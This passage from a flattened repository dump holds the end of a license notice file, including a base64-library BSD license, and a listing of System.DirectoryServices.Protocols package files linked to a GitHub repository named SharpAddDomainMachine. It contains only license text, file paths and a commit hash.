341 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
342 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
343 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
344 |
345 | License notice for vectorized base64 encoding / decoding
346 | --------------------------------------------------------
347 |
348 | Copyright (c) 2005-2007, Nick Galbreath
349 | Copyright (c) 2013-2017, Alfred Klomp
350 | Copyright (c) 2015-2017, Wojciech Mula
351 | Copyright (c) 2016-2017, Matthieu Darbois
352 | All rights reserved.
353 |
354 | Redistribution and use in source and binary forms, with or without
355 | modification, are permitted provided that the following conditions are
356 | met:
357 |
358 | - Redistributions of source code must retain the above copyright notice,
359 | this list of conditions and the following disclaimer.
360 |
361 | - Redistributions in binary form must reproduce the above copyright
362 | notice, this list of conditions and the following disclaimer in the
363 | documentation and/or other materials provided with the distribution.
364 |
365 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
366 | IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
367 | TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
368 | PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
369 | HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
370 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
371 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
372 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
373 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
374 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
375 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
376 |
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/lib/net45/_._:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/lib/net45/_._
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/lib/netstandard2.0/System.DirectoryServices.Protocols.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/lib/netstandard2.0/System.DirectoryServices.Protocols.dll
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/ref/net45/_._:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/ref/net45/_._
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/ref/netstandard2.0/System.DirectoryServices.Protocols.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/ref/netstandard2.0/System.DirectoryServices.Protocols.dll
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/runtimes/win/lib/net45/_._:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/runtimes/win/lib/net45/_._
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/runtimes/win/lib/netcoreapp2.0/System.DirectoryServices.Protocols.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/runtimes/win/lib/netcoreapp2.0/System.DirectoryServices.Protocols.dll
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/useSharedDesignerContext.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/useSharedDesignerContext.txt
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/version.txt:
--------------------------------------------------------------------------------
1 | 0f7f38c4fd323b26da10cce95f857f77f0f09b48
2 |
--------------------------------------------------------------------------------